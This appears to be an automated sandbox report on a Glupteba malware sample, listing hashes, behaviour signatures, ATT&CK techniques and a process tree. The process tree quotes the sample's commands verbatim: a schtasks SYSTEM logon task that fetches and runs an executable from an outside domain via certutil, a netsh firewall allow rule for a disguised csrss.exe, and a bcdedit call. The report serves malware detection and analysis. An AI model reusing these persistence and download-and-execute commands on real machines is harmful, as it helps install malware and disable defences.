glupteba | 3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5

General

Target

3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
Size

3.8MB
MD5

a8a06dda58372e281b89e933e33e30e7
SHA1

86a815d7a725411d48dff6b1457903e7db4f1870
SHA256

3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5
SHA512

f618c2ed2fe6fcaf068f1074ed4dd4b3e06d54d65f2820b942675645039f381c8a10bc79aa0909b4a9fe4007ba2251741df6c50bad4a31827f7561b3be120a6b

Score

10^/10

glupteba dropper evasion loader

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/860-56-0x0000000005360000-0x0000000005A56000-memory.dmp	family_glupteba

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

1984 bcdedit.exe
Drops file in Windows directory 1 IoCs

Processes:

description ioc process

File created C:\Windows\Logs\CBS\CbsPersist_20220525001806.cab
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1780 schtasks.exe
1560 schtasks.exe

pid	process
1984	bcdedit.exe

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20220525001806.cab

pid	process
1780	schtasks.exe
1560	schtasks.exe

Modifies data under HKEY_USERS 1 IoCs

Processes:

netsh.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe

pid	process
860	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
1500	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe

description	pid	process
Token: SeDebugPrivilege	860	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
Token: SeImpersonatePrivilege	860	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.execmd.exe

description	pid	process	target process
PID 1500 wrote to memory of 108	1500	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe	cmd.exe
PID 1500 wrote to memory of 108	1500	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe	cmd.exe
PID 1500 wrote to memory of 108	1500	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe	cmd.exe
PID 1500 wrote to memory of 108	1500	3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe	cmd.exe
PID 108 wrote to memory of 608	108	cmd.exe	netsh.exe
PID 108 wrote to memory of 608	108	cmd.exe	netsh.exe
PID 108 wrote to memory of 608	108	cmd.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
"C:\Users\Admin\AppData\Local\Temp\3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:860

C:\Users\Admin\AppData\Local\Temp\3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe
"C:\Users\Admin\AppData\Local\Temp\3f5945fdfbe51ac34a956c098a2975723cee851dc71e69b2d208b5eccee438b5.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1500

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:108

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:1368

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:1780

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:1560

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:1616

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:1984

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220525001806.log C:\Windows\Logs\CBS\CbsPersist_20220525001806.cab
1⤵
PID:1288

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies data under HKEY_USERS
PID:608

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Download Submit
C:\Windows\rss\csrss.exe
Filesize
31KB

MD5
ea8643a33bebbcecfa5ce199db0f6cc1

SHA1
3cd26f90d2004370c096fc2f7c551799d98807a5

SHA256
2fb71c398670798f5cd1c273366b0a3cd18d766ae1d6c51626a0050b7bee8f01

SHA512
12d1abce3040ea6d9e805a77dd7bbfa3fab206a18943355cada1dfb76630ea441be5dd59ec6150b0178a87e39cdb49c40554fc46c7937897d090fc0f89dd0724

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll

Download Submit
\Windows\rss\csrss.exe
Filesize
75KB

MD5
aee1c79dd26d34559febb8000f7318e1

SHA1
12397e42a2255abca9c34155e9b3f247be72ed81

SHA256
6f096cf15060b992d66f80c2ccf852f202d5027ee92e29f7c1b7c8e23280699e

SHA512
c4d22888318739a0aeedbfd17e751b46e3240bcfe632ac7c5f8ffd63ff0f43df367fb73ddf0ad727e8b3efb891b1ebc9eb94f9a32b9eba4873d5aa32913ea614

Download Submit
\Windows\rss\csrss.exe
Filesize
893KB

MD5
17681ce92e484c7e8f255365e71ad730

SHA1
e73b4e458963e02259ca98ecb4831464279bc14b

SHA256
34f94f786bf9fdc83178432302d7877d0478e5da8f5442c27b90d104a429b124

SHA512
f548f3395c626d528b60c0a9dd78014abc256c6b1f240aa2d418f713aef32d7e3eb66ee1668d38eec3844fc4c480f707ad64f75ac59fd0456ef63060b1a6a6cd

Download Submit
memory/108-59-0x0000000000000000-mapping.dmp

Download
memory/608-61-0x000007FEFBE11000-0x000007FEFBE13000-memory.dmp

Filesize
8KB

Download
memory/608-60-0x0000000000000000-mapping.dmp

Download
memory/860-57-0x0000000000400000-0x00000000036BB000-memory.dmp

Filesize
50.7MB

Download
memory/860-55-0x0000000004FB0000-0x0000000005357000-memory.dmp

Filesize
3.7MB

Download
memory/860-54-0x0000000004FB0000-0x0000000005357000-memory.dmp

Filesize
3.7MB

Download
memory/860-56-0x0000000005360000-0x0000000005A56000-memory.dmp

Filesize
7.0MB

Download
memory/1368-69-0x0000000005220000-0x00000000055C7000-memory.dmp

Filesize
3.7MB

Download
memory/1368-68-0x0000000005220000-0x00000000055C7000-memory.dmp

Filesize
3.7MB

Download
memory/1368-70-0x0000000000400000-0x00000000036BB000-memory.dmp

Filesize
50.7MB

Download
memory/1368-64-0x0000000000000000-mapping.dmp

Download
memory/1500-67-0x0000000000400000-0x00000000036BB000-memory.dmp

Filesize
50.7MB

Download
memory/1500-58-0x00000000051E0000-0x0000000005587000-memory.dmp

Filesize
3.7MB

Download
memory/1500-66-0x00000000051E0000-0x0000000005587000-memory.dmp

Filesize
3.7MB

Download
memory/1984-84-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads